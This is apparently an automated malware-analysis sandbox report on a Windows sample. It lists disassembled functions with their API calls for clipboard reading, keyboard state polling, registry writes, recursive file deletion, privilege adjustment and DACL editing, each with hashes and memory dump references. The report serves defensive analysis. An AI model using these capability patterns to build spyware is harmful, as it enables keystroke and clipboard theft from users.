                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007A8915
                    • GetProcessWindowStation.USER32 ref: 007A892E
                    • SetProcessWindowStation.USER32(00000000), ref: 007A8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007A8952
                      • Part of subcall function 007A8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8851), ref: 007A8728
                      • Part of subcall function 007A8713: CloseHandle.KERNEL32(?,?,007A8851), ref: 007A873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: a6e3eeadd078ca3d9e14e4d0f3d3356794207a8ba52340431a3fa7f759be274b
                    • Instruction ID: 4ef5a74cbb2cc8fbffe266477cb831af0fe22809a886aced338bcc874b8522eb
                    • Opcode Fuzzy Hash: a6e3eeadd078ca3d9e14e4d0f3d3356794207a8ba52340431a3fa7f759be274b
                    • Instruction Fuzzy Hash: 4A818D71901209EFDF51DFA4CC49AEE7BB8FF45304F08826AF911A6261DB398E14DB61
                    Function 007C425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(007DF910), ref: 007C4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 007C4292
                    • GetClipboardData.USER32(0000000D), ref: 007C429A
                    • CloseClipboard.USER32 ref: 007C42A6
                    • GlobalLock.KERNEL32(00000000), ref: 007C42C2
                    • CloseClipboard.USER32 ref: 007C42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007C42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 007C42EE
                    • GetClipboardData.USER32(00000001), ref: 007C42F6
                    • GlobalLock.KERNEL32(00000000), ref: 007C4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 007C4337
                    • CloseClipboard.USER32 ref: 007C4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: dc00600e37ec9fe92f46fe34cf3dba2491c2332f3654fd8791259f8ca78cfc9a
                    • Instruction ID: 114aca2aaa43bd58afc2031bccd98958a78d3bc94bc9154faeacb61435369e2f
                    • Opcode Fuzzy Hash: dc00600e37ec9fe92f46fe34cf3dba2491c2332f3654fd8791259f8ca78cfc9a
                    • Instruction Fuzzy Hash: 4D51B271204301ABD311EF60EC9AFAE77B8BF84B01F14852EF956D21A1DB78D904CB66
                    Function 007BC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 007BC9F8
                    • FindClose.KERNEL32(00000000), ref: 007BCA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007BCA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007BCAAF
                    • __swprintf.LIBCMT ref: 007BCAFB
                    • __swprintf.LIBCMT ref: 007BCB3E
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • __swprintf.LIBCMT ref: 007BCB92
                      • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                    • __swprintf.LIBCMT ref: 007BCBE0
                      • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 00773953
                      • Part of subcall function 007738D8: __flsbuf.LIBCMT ref: 0077396B
                    • __swprintf.LIBCMT ref: 007BCC2F
                    • __swprintf.LIBCMT ref: 007BCC7E
                    • __swprintf.LIBCMT ref: 007BCCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 6e4baafe0490bac23245cca8f01fd4c5fb2d47221ba8e162f20d92d515f0bfbb
                    • Instruction ID: c12a9c253c5cd44459cf25ca6a9a1ef6119a1d5c5f2eaf24b57a5583737b0221
                    • Opcode Fuzzy Hash: 6e4baafe0490bac23245cca8f01fd4c5fb2d47221ba8e162f20d92d515f0bfbb
                    • Instruction Fuzzy Hash: 7EA12EB1518305EBC704EB64C88ADEFB7ECBF94701F408919F986D6191EB78DA09C762
                    Function 007BF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007BF221
                    • _wcscmp.LIBCMT ref: 007BF236
                    • _wcscmp.LIBCMT ref: 007BF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 007BF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 007BF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 007BF291
                    • FindClose.KERNEL32(00000000), ref: 007BF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF2B8
                    • _wcscmp.LIBCMT ref: 007BF2DF
                    • _wcscmp.LIBCMT ref: 007BF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF308
                    • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF330
                    • FindClose.KERNEL32(00000000), ref: 007BF33D
                    • FindClose.KERNEL32(00000000), ref: 007BF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: cb4a15613ecd241f3cacfa7a9742c34eaffa90ddebd797e4a4e82004408e8437
                    • Instruction ID: bedfa6d8b89dadff880406af8cc15feaeb7c35ead23c421fef8673ee93c79950
                    • Opcode Fuzzy Hash: cb4a15613ecd241f3cacfa7a9742c34eaffa90ddebd797e4a4e82004408e8437
                    • Instruction Fuzzy Hash: 5331F376501209AADF14DBB4DC89BDE73FCBF08760F148176E815E31A0EB38DA44CA64
                    Function 007D0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0BDE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,007DF910,00000000,?,00000000,?,?), ref: 007D0C4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D0C94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D0D1D
                    • RegCloseKey.ADVAPI32(?), ref: 007D103D
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D104A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 7f4bd766ae6babd3d80ab4bf3057c5b5ce0a059b108e43281d71ba54cba3fa6b
                    • Instruction ID: d16ec6e96ee5a3572154d7dfa45a486584526b044b73d531a8de750855417160
                    • Opcode Fuzzy Hash: 7f4bd766ae6babd3d80ab4bf3057c5b5ce0a059b108e43281d71ba54cba3fa6b
                    • Instruction Fuzzy Hash: 94024875200601DFCB14EF24C895A6AB7F5EF88714F04885EF98A9B362CB78ED45CB91
                    Function 007BF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007BF37E
                    • _wcscmp.LIBCMT ref: 007BF393
                    • _wcscmp.LIBCMT ref: 007BF3AA
                      • Part of subcall function 007B45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007B45DC
                    • FindNextFileW.KERNEL32(00000000,?), ref: 007BF3D9
                    • FindClose.KERNEL32(00000000), ref: 007BF3E4
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007BF400
                    • _wcscmp.LIBCMT ref: 007BF427
                    • _wcscmp.LIBCMT ref: 007BF43E
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BF450
                    • SetCurrentDirectoryW.KERNEL32(0080A5A0), ref: 007BF46E
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007BF478
                    • FindClose.KERNEL32(00000000), ref: 007BF485
                    • FindClose.KERNEL32(00000000), ref: 007BF497
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: 608cdff08954e6f50a469e5f3cf924b781b58099439c3f16c69dcc61cbb457b5
                    • Instruction ID: ba5c64bed86c27e752d6899d54b29182415d9ea71df283b5791404d887244343
                    • Opcode Fuzzy Hash: 608cdff08954e6f50a469e5f3cf924b781b58099439c3f16c69dcc61cbb457b5
                    • Instruction Fuzzy Hash: 3031E5715012596FDF149BA4EC88BDE77ACAF09760F148276E854E31A0DB3CDA44CA64
                    Function 007A81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                      • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                      • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                      • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                      • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                      • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                      • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A825B
                    • _memset.LIBCMT ref: 007A8270
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A828F
                    • GetLengthSid.ADVAPI32(?), ref: 007A82A0
                    • GetAce.ADVAPI32(?,00000000,?), ref: 007A82DD
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A82F9
                    • GetLengthSid.ADVAPI32(?), ref: 007A8316
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8325
                    • HeapAlloc.KERNEL32(00000000), ref: 007A832C
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A834D
                    • CopySid.ADVAPI32(00000000), ref: 007A8354
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8385
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A83AB
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A83BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 9f332db6a8668143979ca09f3ed3ef54ad8eea8f23b43d467c05a3b563016255
                    • Instruction ID: a24579a785ad46233dfae87b5732f899dcbd4aec624e616479bf82758ddf6b4c
                    • Opcode Fuzzy Hash: 9f332db6a8668143979ca09f3ed3ef54ad8eea8f23b43d467c05a3b563016255
                    • Instruction Fuzzy Hash: E2614D71900209EFDF00DF95DC48AEEBBB9FF45700F14826AF816A7291DB399A05CB61
                    Function 00766843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oav$UCP)$UTF)$UTF16)$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                    • API String ID: 0-3342537335
                    • Opcode ID: 9668e0c512b1f8ca69f7d1f934e84e47c2a311a84eb2a5821f08ac5a6ae2e105
                    • Instruction ID: 6b85dce20f8c0e13b3615d2f5b31015495863c510e450e32544b9a2b928d6861
                    • Opcode Fuzzy Hash: 9668e0c512b1f8ca69f7d1f934e84e47c2a311a84eb2a5821f08ac5a6ae2e105
                    • Instruction Fuzzy Hash: 46727175E00219DBDF14CF59C8807AEB7B5FF89710F54816AE94AEB280EB789D41CB90
                    Function 007D0665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D0737
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007D07D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D086E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D0AAD
                    • RegCloseKey.ADVAPI32(00000000), ref: 007D0ABA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    • Opcode ID: 6d5b0887a62931677f975dfd5565187a0464de0d8bdd379d7f86f8bdd5bb4840
                    • Instruction ID: 7bc0f76b90e8fc8086d3b1e1311e765fcdeb7b4b8a253b2f38a04a395f0fcb18
                    • Opcode Fuzzy Hash: 6d5b0887a62931677f975dfd5565187a0464de0d8bdd379d7f86f8bdd5bb4840
                    • Instruction Fuzzy Hash: 1CE11B75604210EFCB14DF24C895E6ABBF8EF89714F04C56EF84ADB262DA34E905CB91
                    Function 007B0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 007B0241
                    • GetAsyncKeyState.USER32(000000A0), ref: 007B02C2
                    • GetKeyState.USER32(000000A0), ref: 007B02DD
                    • GetAsyncKeyState.USER32(000000A1), ref: 007B02F7
                    • GetKeyState.USER32(000000A1), ref: 007B030C
                    • GetAsyncKeyState.USER32(00000011), ref: 007B0324
                    • GetKeyState.USER32(00000011), ref: 007B0336
                    • GetAsyncKeyState.USER32(00000012), ref: 007B034E
                    • GetKeyState.USER32(00000012), ref: 007B0360
                    • GetAsyncKeyState.USER32(0000005B), ref: 007B0378
                    • GetKeyState.USER32(0000005B), ref: 007B038A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: ab267d40ef5fea27c3ea38cdb65fc34caa4210e91166f0a5d323939c7c417240
                    • Instruction ID: ad2b822a5be2c5844b4404e420c5d91e7792a6295627bd9edafb78a32b279b1c
                    • Opcode Fuzzy Hash: ab267d40ef5fea27c3ea38cdb65fc34caa4210e91166f0a5d323939c7c417240
                    • Instruction Fuzzy Hash: A54189245047C96EFF319A64980C3EBBEE07F12344F08819ED5C6471C2EB9C99D887E2
                    Function 00764140 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID: ERCP$Oav$VUUU$VUUU$VUUU$VUUU$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                    • API String ID: 0-1081084498
                    • Opcode ID: 5551812bcb78d9286c6ecc8ed4f17cc45c837f8a68f6f40cfc462463aae5d3e4
                    • Instruction ID: 751189f1d55a18b52620cdb9cfa777c93c94004bf4cae83b58298671f19d2e69
                    • Opcode Fuzzy Hash: 5551812bcb78d9286c6ecc8ed4f17cc45c837f8a68f6f40cfc462463aae5d3e4
                    • Instruction Fuzzy Hash: 2CA27E70E0421ACBDF28CF58D9907AEB7B1FF55314F2481AADC56A7280E7389E85CB51
                    Function 007C4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    • Opcode ID: 8670d9f05b5076017d1a4c584bcc2d93491529cc37e1e36bfa14418de6188106
                    • Instruction ID: e4b13d0acad2b43d6472882270cdd3f796446cc3fa7c4ea39129f13053ce8c42
                    • Opcode Fuzzy Hash: 8670d9f05b5076017d1a4c584bcc2d93491529cc37e1e36bfa14418de6188106
                    • Instruction Fuzzy Hash: 01215A35201210DFDB10AF64EC19FA97BA8EF54711F14C02AF946DB2A1DB79E911CB98
                    Function 007B3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                      • Part of subcall function 007B4CD3: GetFileAttributesW.KERNEL32(?,007B3947), ref: 007B4CD4
                    • FindFirstFileW.KERNEL32(?,?), ref: 007B3ADF
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007B3B87
                    • MoveFileW.KERNEL32(?,?), ref: 007B3B9A
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007B3BB7
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007B3BD9
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007B3BF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    • Opcode ID: a7533f5ea6ebdf521b8f99cca63e72745c89a3927051008ddd3b609274796f1e
                    • Instruction ID: d59df1d303ff8287c89f1cc7ae3c2417376dc5d6eb4abb93728a34dbddfb85d6
                    • Opcode Fuzzy Hash: a7533f5ea6ebdf521b8f99cca63e72745c89a3927051008ddd3b609274796f1e
                    • Instruction Fuzzy Hash: BE51843180114CDACF15EBA0DD96AEEB779AF14301F6481A9E84277095EF786F4DCB60
                    Function 007BF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007BF6AB
                    • Sleep.KERNEL32(0000000A), ref: 007BF6DB
                    • _wcscmp.LIBCMT ref: 007BF6EF
                    • _wcscmp.LIBCMT ref: 007BF70A
                    • FindNextFileW.KERNEL32(?,?), ref: 007BF7A8
                    • FindClose.KERNEL32(00000000), ref: 007BF7BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
